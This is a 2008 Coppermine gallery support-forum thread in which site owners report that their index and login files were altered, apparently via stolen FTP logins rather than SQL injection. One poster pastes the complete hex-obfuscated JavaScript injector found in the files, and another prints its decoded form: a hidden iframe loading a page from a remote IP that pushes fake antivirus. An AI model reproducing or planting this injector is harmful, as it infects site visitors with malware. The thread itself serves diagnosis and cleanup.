1.4.18 (Stable) SQL Injection issue. (I think) 1.4.18 (Stable) SQL Injection issue. (I think)
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

1.4.18 (Stable) SQL Injection issue. (I think)

Started by adam1942, June 11, 2008, 11:45:36 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

adam1942

Folks,

I installed the version 1.4.14 of coppermine threw fantisco, I then upgraded stright away (within 5 minutes) of using 1.4.14. the gallery has been known to the public for about 1 day / 1 and a half days and ive already had an SQL injection(I think) which is loading crap from advancedxpdefender.xxxxx. Has anyone else had this? I cannot find how to remove it as i cannot find anything in the SQL database linking to advancedxpdefender. is there any specific files i should be checking on the FTP?

ADam.

adam1942

er thats suppost to say I upgraded to 1.4.18 sorry!

Nibbler

Check for any files modified since you made the update. If you just installed then you can just upload clean copies of all the files. What makes you think it's SQL injection? Do you have a log file that indicates this?

adam1942

nope but no one else has access to the FTP to access any file.. all perms should be set right. I had an SQL injection before on a forum and it loaded excactly the same way which is whats making me think its a SQL injection, I will check for files that are modded and get back to you.

adam1942

ok fella, found out that index.php and login.php had been edited today. the worrying thing is that NO one has access to the FTP and the password is numbers/letters and chactures. Any ideas?

adam1942

ive also taken a backup of them if you wish to see the infected/modified file.

adam1942

just found out every index.php/index.html/login.php has been changed on my server. This is webhosting so i think maybe the whole box was attacked! ooops :(

wurst

i was looking for this curious incident and so i found this page. i think it has nothing to do especially with coppermine. i design a few pages on different hosters and i have exact these situation: a lot of, (not every) index.php/html/htm files have this javascript tag:

script>
<!--
var d=document,kol=561;
function O10H4851354BB6EB1(H4851354BB76AA){ var H4851354BB7EAB = 16; return( parseInt(H4851354BB76AA,H4851354BB7EAB));}function H4851354BB8E94(H4851354BB968D){ var H4851354BBAE91 = 2; var H4851354BB9E9A='';for(H4851354BBA67D=0; H4851354BBA67D<H4851354BB968D.length; H4851354BBA67D+=H4851354BBAE91){ H4851354BB9E9A += ( String.fromCharCode (O10H4851354BB6EB1(H4851354BB968D.substr(H4851354BBA67D, H4851354BBAE91))));}return H4851354BB9E9A;} document.write(H4851354BB8E94('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>


my suspicion is, that i had installed a worm or eventually an injection software on my local pc, that read all my ftp logins and write this javascript tag to all index files!
i saw in the status bar of my browser that advancedxpdefender.com and 77.221.133.198 (russia) was loading. when i left the page or closed the window, a popup appeared, with a warning, that my pc isnt protected and i should go to advancedxp, no i dont write this f...... domain name anymore.

now i reinstalled my os and it seems to work as well...

SaWey

yes, this code, when evaluated, looks likethis:

<SCRIPT>
window.status='Done';
document.write('<iframe name=[random_nr] src=\'http://77.221.X.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93  style=\'display: none\'></iframe>')
</SCRIPT>

Joachim Müller

not a case of sql injection though as far as I can tell. Seems like you have fallen victim to a similar hack as the one discussed in http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
A copycat may have changed the workload of the hack, but probably is using the same attack pattern. Therefore, do as suggested in http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

wurst

i recommend to change ALL your passwords from a clean machine. i changed all but one ftp account, and this one is continued with attacks with said javascript code. so the attacks dont come from the one machine but from extern. my hoster said that ftp actions came from 77.221.....